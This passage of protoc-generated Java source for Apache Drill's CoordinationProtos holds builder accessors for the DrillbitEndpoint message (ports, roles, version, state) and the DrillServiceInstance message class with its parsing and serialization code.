* <code>optional string address = 1;</code>
* @return This builder for chaining.
*/
public Builder clearAddress() {
bitField0_ = (bitField0_ & ~0x00000001);
address_ = getDefaultInstance().getAddress();
onChanged();
return this;
}
/**
* <code>optional string address = 1;</code>
* @param value The bytes for address to set.
* @return This builder for chaining.
*/
public Builder setAddressBytes(
com.google.protobuf.ByteString value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000001;
address_ = value;
onChanged();
return this;
}
private int userPort_ ;
/**
* <code>optional int32 user_port = 2;</code>
* @return Whether the userPort field is set.
*/
public boolean hasUserPort() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional int32 user_port = 2;</code>
* @return The userPort.
*/
public int getUserPort() {
return userPort_;
}
/**
* <code>optional int32 user_port = 2;</code>
* @param value The userPort to set.
* @return This builder for chaining.
*/
public Builder setUserPort(int value) {
bitField0_ |= 0x00000002;
userPort_ = value;
onChanged();
return this;
}
/**
* <code>optional int32 user_port = 2;</code>
* @return This builder for chaining.
*/
public Builder clearUserPort() {
bitField0_ = (bitField0_ & ~0x00000002);
userPort_ = 0;
onChanged();
return this;
}
private int controlPort_ ;
/**
* <code>optional int32 control_port = 3;</code>
* @return Whether the controlPort field is set.
*/
public boolean hasControlPort() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional int32 control_port = 3;</code>
* @return The controlPort.
*/
public int getControlPort() {
return controlPort_;
}
/**
* <code>optional int32 control_port = 3;</code>
* @param value The controlPort to set.
* @return This builder for chaining.
*/
public Builder setControlPort(int value) {
bitField0_ |= 0x00000004;
controlPort_ = value;
onChanged();
return this;
}
/**
* <code>optional int32 control_port = 3;</code>
* @return This builder for chaining.
*/
public Builder clearControlPort() {
bitField0_ = (bitField0_ & ~0x00000004);
controlPort_ = 0;
onChanged();
return this;
}
private int dataPort_ ;
/**
* <code>optional int32 data_port = 4;</code>
* @return Whether the dataPort field is set.
*/
public boolean hasDataPort() {
return ((bitField0_ & 0x00000008) != 0);
}
/**
* <code>optional int32 data_port = 4;</code>
* @return The dataPort.
*/
public int getDataPort() {
return dataPort_;
}
/**
* <code>optional int32 data_port = 4;</code>
* @param value The dataPort to set.
* @return This builder for chaining.
*/
public Builder setDataPort(int value) {
bitField0_ |= 0x00000008;
dataPort_ = value;
onChanged();
return this;
}
/**
* <code>optional int32 data_port = 4;</code>
* @return This builder for chaining.
*/
public Builder clearDataPort() {
bitField0_ = (bitField0_ & ~0x00000008);
dataPort_ = 0;
onChanged();
return this;
}
private org.apache.drill.exec.proto.CoordinationProtos.Roles roles_;
private com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.Roles, org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder, org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder> rolesBuilder_;
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return Whether the roles field is set.
*/
public boolean hasRoles() {
return ((bitField0_ & 0x00000010) != 0);
}
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return The roles.
*/
public org.apache.drill.exec.proto.CoordinationProtos.Roles getRoles() {
if (rolesBuilder_ == null) {
return roles_ == null ? org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance() : roles_;
} else {
return rolesBuilder_.getMessage();
}
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public Builder setRoles(org.apache.drill.exec.proto.CoordinationProtos.Roles value) {
if (rolesBuilder_ == null) {
if (value == null) {
throw new NullPointerException();
}
roles_ = value;
onChanged();
} else {
rolesBuilder_.setMessage(value);
}
bitField0_ |= 0x00000010;
return this;
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public Builder setRoles(
org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder builderForValue) {
if (rolesBuilder_ == null) {
roles_ = builderForValue.build();
onChanged();
} else {
rolesBuilder_.setMessage(builderForValue.build());
}
bitField0_ |= 0x00000010;
return this;
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public Builder mergeRoles(org.apache.drill.exec.proto.CoordinationProtos.Roles value) {
if (rolesBuilder_ == null) {
if (((bitField0_ & 0x00000010) != 0) &&
roles_ != null &&
roles_ != org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance()) {
roles_ =
org.apache.drill.exec.proto.CoordinationProtos.Roles.newBuilder(roles_).mergeFrom(value).buildPartial();
} else {
roles_ = value;
}
onChanged();
} else {
rolesBuilder_.mergeFrom(value);
}
bitField0_ |= 0x00000010;
return this;
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public Builder clearRoles() {
if (rolesBuilder_ == null) {
roles_ = null;
onChanged();
} else {
rolesBuilder_.clear();
}
bitField0_ = (bitField0_ & ~0x00000010);
return this;
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder getRolesBuilder() {
bitField0_ |= 0x00000010;
onChanged();
return getRolesFieldBuilder().getBuilder();
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder getRolesOrBuilder() {
if (rolesBuilder_ != null) {
return rolesBuilder_.getMessageOrBuilder();
} else {
return roles_ == null ?
org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance() : roles_;
}
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
private com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.Roles, org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder, org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder>
getRolesFieldBuilder() {
if (rolesBuilder_ == null) {
rolesBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.Roles, org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder, org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder>(
getRoles(),
getParentForChildren(),
isClean());
roles_ = null;
}
return rolesBuilder_;
}
private java.lang.Object version_ = "";
/**
* <code>optional string version = 6;</code>
* @return Whether the version field is set.
*/
public boolean hasVersion() {
return ((bitField0_ & 0x00000020) != 0);
}
/**
* <code>optional string version = 6;</code>
* @return The version.
*/
public java.lang.String getVersion() {
java.lang.Object ref = version_;
if (!(ref instanceof java.lang.String)) {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
version_ = s;
}
return s;
} else {
return (java.lang.String) ref;
}
}
/**
* <code>optional string version = 6;</code>
* @return The bytes for version.
*/
public com.google.protobuf.ByteString
getVersionBytes() {
java.lang.Object ref = version_;
if (ref instanceof String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
version_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
/**
* <code>optional string version = 6;</code>
* @param value The version to set.
* @return This builder for chaining.
*/
public Builder setVersion(
java.lang.String value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000020;
version_ = value;
onChanged();
return this;
}
/**
* <code>optional string version = 6;</code>
* @return This builder for chaining.
*/
public Builder clearVersion() {
bitField0_ = (bitField0_ & ~0x00000020);
version_ = getDefaultInstance().getVersion();
onChanged();
return this;
}
/**
* <code>optional string version = 6;</code>
* @param value The bytes for version to set.
* @return This builder for chaining.
*/
public Builder setVersionBytes(
com.google.protobuf.ByteString value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000020;
version_ = value;
onChanged();
return this;
}
private int state_ = 0;
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return Whether the state field is set.
*/
public boolean hasState() {
return ((bitField0_ & 0x00000040) != 0);
}
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return The state.
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State getState() {
@SuppressWarnings("deprecation")
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State result = org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State.valueOf(state_);
return result == null ? org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State.STARTUP : result;
}
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @param value The state to set.
* @return This builder for chaining.
*/
public Builder setState(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000040;
state_ = value.getNumber();
onChanged();
return this;
}
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return This builder for chaining.
*/
public Builder clearState() {
bitField0_ = (bitField0_ & ~0x00000040);
state_ = 0;
onChanged();
return this;
}
private int httpPort_ ;
/**
* <code>optional int32 http_port = 8;</code>
* @return Whether the httpPort field is set.
*/
public boolean hasHttpPort() {
return ((bitField0_ & 0x00000080) != 0);
}
/**
* <code>optional int32 http_port = 8;</code>
* @return The httpPort.
*/
public int getHttpPort() {
return httpPort_;
}
/**
* <code>optional int32 http_port = 8;</code>
* @param value The httpPort to set.
* @return This builder for chaining.
*/
public Builder setHttpPort(int value) {
bitField0_ |= 0x00000080;
httpPort_ = value;
onChanged();
return this;
}
/**
* <code>optional int32 http_port = 8;</code>
* @return This builder for chaining.
*/
public Builder clearHttpPort() {
bitField0_ = (bitField0_ & ~0x00000080);
httpPort_ = 0;
onChanged();
return this;
}
@java.lang.Override
public final Builder setUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.setUnknownFields(unknownFields);
}
@java.lang.Override
public final Builder mergeUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.mergeUnknownFields(unknownFields);
}
// @@protoc_insertion_point(builder_scope:exec.DrillbitEndpoint)
}
// @@protoc_insertion_point(class_scope:exec.DrillbitEndpoint)
private static final org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint DEFAULT_INSTANCE;
static {
DEFAULT_INSTANCE = new org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint();
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getDefaultInstance() {
return DEFAULT_INSTANCE;
}
@java.lang.Deprecated public static final com.google.protobuf.Parser<DrillbitEndpoint>
PARSER = new com.google.protobuf.AbstractParser<DrillbitEndpoint>() {
@java.lang.Override
public DrillbitEndpoint parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new DrillbitEndpoint(input, extensionRegistry);
}
};
public static com.google.protobuf.Parser<DrillbitEndpoint> parser() {
return PARSER;
}
@java.lang.Override
public com.google.protobuf.Parser<DrillbitEndpoint> getParserForType() {
return PARSER;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getDefaultInstanceForType() {
return DEFAULT_INSTANCE;
}
}
public interface DrillServiceInstanceOrBuilder extends
// @@protoc_insertion_point(interface_extends:exec.DrillServiceInstance)
com.google.protobuf.MessageOrBuilder {
/**
* <code>optional string id = 1;</code>
* @return Whether the id field is set.
*/
boolean hasId();
/**
* <code>optional string id = 1;</code>
* @return The id.
*/
java.lang.String getId();
/**
* <code>optional string id = 1;</code>
* @return The bytes for id.
*/
com.google.protobuf.ByteString
getIdBytes();
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return Whether the registrationTimeUTC field is set.
*/
boolean hasRegistrationTimeUTC();
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return The registrationTimeUTC.
*/
long getRegistrationTimeUTC();
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return Whether the endpoint field is set.
*/
boolean hasEndpoint();
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return The endpoint.
*/
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getEndpoint();
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder getEndpointOrBuilder();
}
/**
* Protobuf type {@code exec.DrillServiceInstance}
*/
public static final class DrillServiceInstance extends
com.google.protobuf.GeneratedMessageV3 implements
// @@protoc_insertion_point(message_implements:exec.DrillServiceInstance)
DrillServiceInstanceOrBuilder {
private static final long serialVersionUID = 0L;
// Use DrillServiceInstance.newBuilder() to construct.
private DrillServiceInstance(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
super(builder);
}
private DrillServiceInstance() {
id_ = "";
}
@java.lang.Override
@SuppressWarnings({"unused"})
protected java.lang.Object newInstance(
UnusedPrivateParameter unused) {
return new DrillServiceInstance();
}
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet
getUnknownFields() {
return this.unknownFields;
}
private DrillServiceInstance(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
this();
if (extensionRegistry == null) {
throw new java.lang.NullPointerException();
}
int mutable_bitField0_ = 0;
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
case 10: {
com.google.protobuf.ByteString bs = input.readBytes();
bitField0_ |= 0x00000001;
id_ = bs;
break;
}
case 16: {
bitField0_ |= 0x00000002;
registrationTimeUTC_ = input.readInt64();
break;
}
case 26: {
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder subBuilder = null;
if (((bitField0_ & 0x00000004) != 0)) {
subBuilder = endpoint_.toBuilder();
}
endpoint_ = input.readMessage(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.PARSER, extensionRegistry);
if (subBuilder != null) {
subBuilder.mergeFrom(endpoint_);
endpoint_ = subBuilder.buildPartial();
}
bitField0_ |= 0x00000004;
break;
}
default: {
if (!parseUnknownField(
input, unknownFields, extensionRegistry, tag)) {
done = true;
}
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(
e).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillServiceInstance_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillServiceInstance_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.class, org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.Builder.class);
}
private int bitField0_;
public static final int ID_FIELD_NUMBER = 1;
private volatile java.lang.Object id_;
/**
* <code>optional string id = 1;</code>
* @return Whether the id field is set.
*/
public boolean hasId() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional string id = 1;</code>
* @return The id.
*/
public java.lang.String getId() {
java.lang.Object ref = id_;
if (ref instanceof java.lang.String) {
return (java.lang.String) ref;
} else {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
id_ = s;
}
return s;
}
}
/**
* <code>optional string id = 1;</code>
* @return The bytes for id.
*/
public com.google.protobuf.ByteString
getIdBytes() {
java.lang.Object ref = id_;
if (ref instanceof java.lang.String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
id_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
public static final int REGISTRATIONTIMEUTC_FIELD_NUMBER = 2;
private long registrationTimeUTC_;
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return Whether the registrationTimeUTC field is set.
*/
public boolean hasRegistrationTimeUTC() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return The registrationTimeUTC.
*/
public long getRegistrationTimeUTC() {
return registrationTimeUTC_;
}
public static final int ENDPOINT_FIELD_NUMBER = 3;
private org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint endpoint_;
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return Whether the endpoint field is set.
*/
public boolean hasEndpoint() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return The endpoint.
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getEndpoint() {
return endpoint_ == null ? org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance() : endpoint_;
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder getEndpointOrBuilder() {
return endpoint_ == null ? org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance() : endpoint_;
}
private byte memoizedIsInitialized = -1;
@java.lang.Override
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
memoizedIsInitialized = 1;
return true;
}
@java.lang.Override
public void writeTo(com.google.protobuf.CodedOutputStream output)
throws java.io.IOException {
if (((bitField0_ & 0x00000001) != 0)) {
com.google.protobuf.GeneratedMessageV3.writeString(output, 1, id_);
}
if (((bitField0_ & 0x00000002) != 0)) {
output.writeInt64(2, registrationTimeUTC_);
}
if (((bitField0_ & 0x00000004) != 0)) {
output.writeMessage(3, getEndpoint());
}
unknownFields.writeTo(output);
}
@java.lang.Override
public int getSerializedSize() {
int size = memoizedSize;
if (size != -1) return size;
size = 0;
if (((bitField0_ & 0x00000001) != 0)) {
size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, id_);
}
if (((bitField0_ & 0x00000002) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeInt64Size(2, registrationTimeUTC_);
}
if (((bitField0_ & 0x00000004) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeMessageSize(3, getEndpoint());
}
size += unknownFields.getSerializedSize();
memoizedSize = size;
return size;
}
@java.lang.Override
public boolean equals(final java.lang.Object obj) {
if (obj == this) {
return true;
}
if (!(obj instanceof org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance)) {
return super.equals(obj);
}
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance other = (org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance) obj;
if (hasId() != other.hasId()) return false;
if (hasId()) {
if (!getId()
.equals(other.getId())) return false;
}
if (hasRegistrationTimeUTC() != other.hasRegistrationTimeUTC()) return false;
if (hasRegistrationTimeUTC()) {
if (getRegistrationTimeUTC()
!= other.getRegistrationTimeUTC()) return false;
}
if (hasEndpoint() != other.hasEndpoint()) return false;
if (hasEndpoint()) {
if (!getEndpoint()
.equals(other.getEndpoint())) return false;
}
if (!unknownFields.equals(other.unknownFields)) return false;
return true;
}
@java.lang.Override
public int hashCode() {
if (memoizedHashCode != 0) {
return memoizedHashCode;
}
int hash = 41;
hash = (19 * hash) + getDescriptor().hashCode();
if (hasId()) {
hash = (37 * hash) + ID_FIELD_NUMBER;
hash = (53 * hash) + getId().hashCode();
}
if (hasRegistrationTimeUTC()) {
hash = (37 * hash) + REGISTRATIONTIMEUTC_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashLong(
getRegistrationTimeUTC());
}
if (hasEndpoint()) {
hash = (37 * hash) + ENDPOINT_FIELD_NUMBER;
hash = (53 * hash) + getEndpoint().hashCode();
}
hash = (29 * hash) + unknownFields.hashCode();
memoizedHashCode = hash;
return hash;
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
java.nio.ByteBuffer data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
java.nio.ByteBuffer data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
byte[] data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseDelimitedFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseDelimitedFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
com.google.protobuf.CodedInputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
@java.lang.Override
public Builder newBuilderForType() { return newBuilder(); }
public static Builder newBuilder() {
return DEFAULT_INSTANCE.toBuilder();
}
public static Builder newBuilder(org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance prototype) {
return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
}
@java.lang.Override
public Builder toBuilder() {
return this == DEFAULT_INSTANCE
? new Builder() : new Builder().mergeFrom(this);
}
@java.lang.Override
protected Builder newBuilderForType(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
/**
* Protobuf type {@code exec.DrillServiceInstance}
*/
public static final class Builder extends
com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements
// @@protoc_insertion_point(builder_implements:exec.DrillServiceInstance)
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstanceOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillServiceInstance_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillServiceInstance_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.class, org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.Builder.class);
}
// Construct using org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessageV3
.alwaysUseFieldBuilders) {
getEndpointFieldBuilder();
}
}
@java.lang.Override
public Builder clear() {
super.clear();
id_ = "";
bitField0_ = (bitField0_ & ~0x00000001);
registrationTimeUTC_ = 0L;
bitField0_ = (bitField0_ & ~0x00000002);
if (endpointBuilder_ == null) {
endpoint_ = null;
} else {
endpointBuilder_.clear();
}
bitField0_ = (bitField0_ & ~0x00000004);
return this;
}
@java.lang.Override
public com.google.protobuf.Descriptors.Descriptor
getDescriptorForType() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillServiceInstance_descriptor;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance getDefaultInstanceForType() {
return org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.getDefaultInstance();
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance build() {
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance buildPartial() {
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance result = new org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance(this);
int from_bitField0_ = bitField0_;
int to_bitField0_ = 0;
if (((from_bitField0_ & 0x00000001) != 0)) {
to_bitField0_ |= 0x00000001;
}
result.id_ = id_;
if (((from_bitField0_ & 0x00000002) != 0)) {
result.registrationTimeUTC_ = registrationTimeUTC_;
to_bitField0_ |= 0x00000002;
}
if (((from_bitField0_ & 0x00000004) != 0)) {
if (endpointBuilder_ == null) {
result.endpoint_ = endpoint_;
} else {
result.endpoint_ = endpointBuilder_.build();
}
to_bitField0_ |= 0x00000004;
}
result.bitField0_ = to_bitField0_;
onBuilt();
return result;
}
@java.lang.Override
public Builder clone() {
return super.clone();
}
@java.lang.Override
public Builder setField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.setField(field, value);
}
@java.lang.Override
public Builder clearField(
com.google.protobuf.Descriptors.FieldDescriptor field) {
return super.clearField(field);
}
@java.lang.Override
public Builder clearOneof(
com.google.protobuf.Descriptors.OneofDescriptor oneof) {
return super.clearOneof(oneof);
}
@java.lang.Override
public Builder setRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
int index, java.lang.Object value) {
return super.setRepeatedField(field, index, value);
}
@java.lang.Override
public Builder addRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.addRepeatedField(field, value);
}
@java.lang.Override
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance) {
return mergeFrom((org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance)other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance other) {
if (other == org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.getDefaultInstance()) return this;
if (other.hasId()) {
bitField0_ |= 0x00000001;
id_ = other.id_;
onChanged();
}
if (other.hasRegistrationTimeUTC()) {
setRegistrationTimeUTC(other.getRegistrationTimeUTC());
}
if (other.hasEndpoint()) {
mergeEndpoint(other.getEndpoint());
}
this.mergeUnknownFields(other.unknownFields);
onChanged();
return this;
}
@java.lang.Override
public final boolean isInitialized() {
return true;
}
@java.lang.Override
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage = (org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance) e.getUnfinishedMessage();
throw e.unwrapIOException();
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
private int bitField0_;
private java.lang.Object id_ = "";
/**
* <code>optional string id = 1;</code>
* @return Whether the id field is set.
*/
public boolean hasId() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional string id = 1;</code>
* @return The id.
*/
public java.lang.String getId() {
java.lang.Object ref = id_;
if (!(ref instanceof java.lang.String)) {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
id_ = s;
}
return s;
} else {
return (java.lang.String) ref;
}
}
/**
* <code>optional string id = 1;</code>
* @return The bytes for id.
*/
public com.google.protobuf.ByteString
getIdBytes() {
java.lang.Object ref = id_;
if (ref instanceof String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
id_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
/**
* <code>optional string id = 1;</code>
* @param value The id to set.
* @return This builder for chaining.
*/
public Builder setId(
java.lang.String value) {
